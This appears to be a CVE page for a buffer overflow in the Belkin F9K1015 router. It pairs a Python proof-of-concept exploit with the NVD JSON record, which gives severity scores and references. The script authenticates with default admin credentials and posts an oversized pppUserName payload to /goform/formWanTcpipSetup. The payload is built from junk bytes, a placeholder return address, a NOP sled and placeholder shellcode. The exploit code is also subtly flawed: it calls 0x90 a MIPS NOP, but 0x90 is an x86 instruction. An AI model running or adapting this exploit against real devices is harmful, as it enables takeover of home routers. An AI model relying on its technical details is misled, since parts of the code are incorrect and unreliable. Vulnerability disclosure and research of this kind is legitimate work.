CVE-2025-11299

# CVE-2025-11299 PoC - Belkin F9K1015 Buffer Overflow # Target: /goform/formWanTcpipSetup endpoint # Parameter: pppUserName import requests from pwn import * TARGET_HOST = "192.168.1.1" # Default Belkin router IP TARGET_PORT = 80 AUTH_USER = "admin" AUTH_PASS = "password" # Default or obtained credentials def exploit(): # Step 1: Authenticate to the router session = requests.Session() login_url = f"http://{TARGET_HOST}:{TARGET_PORT}/login.asp" auth_data = { "loginUsername": AUTH_USER, "loginPassword": AUTH_PASS } session.post(login_url, data=auth_data) # Step 2: Prepare buffer overflow payload # The pppUserName parameter has insufficient bounds checking # Overflow the stack buffer to overwrite return address overflow_size = 512 # Adjust based on actual buffer size junk = b"A" * overflow_size # Return address placeholder (MIPS little-endian example) # In real exploit, this would point to shellcode or ROP gadget ret_address = p32(0x7f010001) # NOP sled + shellcode placeholder nop_sled = b"\x90" * 32 # MIPS NOP instruction shellcode = b"\x00" * 64 # Placeholder for actual shellcode payload = junk + ret_address + nop_sled + shellcode # Step 3: Send malicious request to vulnerable endpoint exploit_url = f"http://{TARGET_HOST}:{TARGET_PORT}/goform/formWanTcpipSetup" exploit_data = { "pppUserName": payload.decode('latin-1'), "pppPassword": "test", "wanConnectionType": "PPPoE" } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } try: response = session.post(exploit_url, data=exploit_data, headers=headers) print(f"[*] Exploit sent. Status: {response.status_code}") # Check if device crashed or shellcode executed except requests.exceptions.RequestException as e: print(f"[!] Request failed (device may have crashed): {e}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-11299", "sourceIdentifier": "[email protected]", "published": "2025-10-05T19:15:59.730", "lastModified": "2025-10-07T17:17:03.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Belkin F9K1015 1.00.10. The affected element is an unknown function of the file /goform/formWanTcpipSetup. The manipulation of the argument pppUserName leads to buffer overflow. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:belkin:f9k1015_firmware:1.00.10:*:*:*:*:*:*:*", "matchCriteriaId": "3DEB0AFD-4E01-4FD5-8A41-6BD0E2D4DF0B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:belkin:f9k1015:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D273CA6-07A9-43B2-87B3-D0DE1A5B89FA"}]}]}], "references": [{"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formWanTcpipSetup.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formWanTcpipSetup.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327180", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327180", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.661303", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formWanTcpipSetup.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formWanTcpipSetup.md#poc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}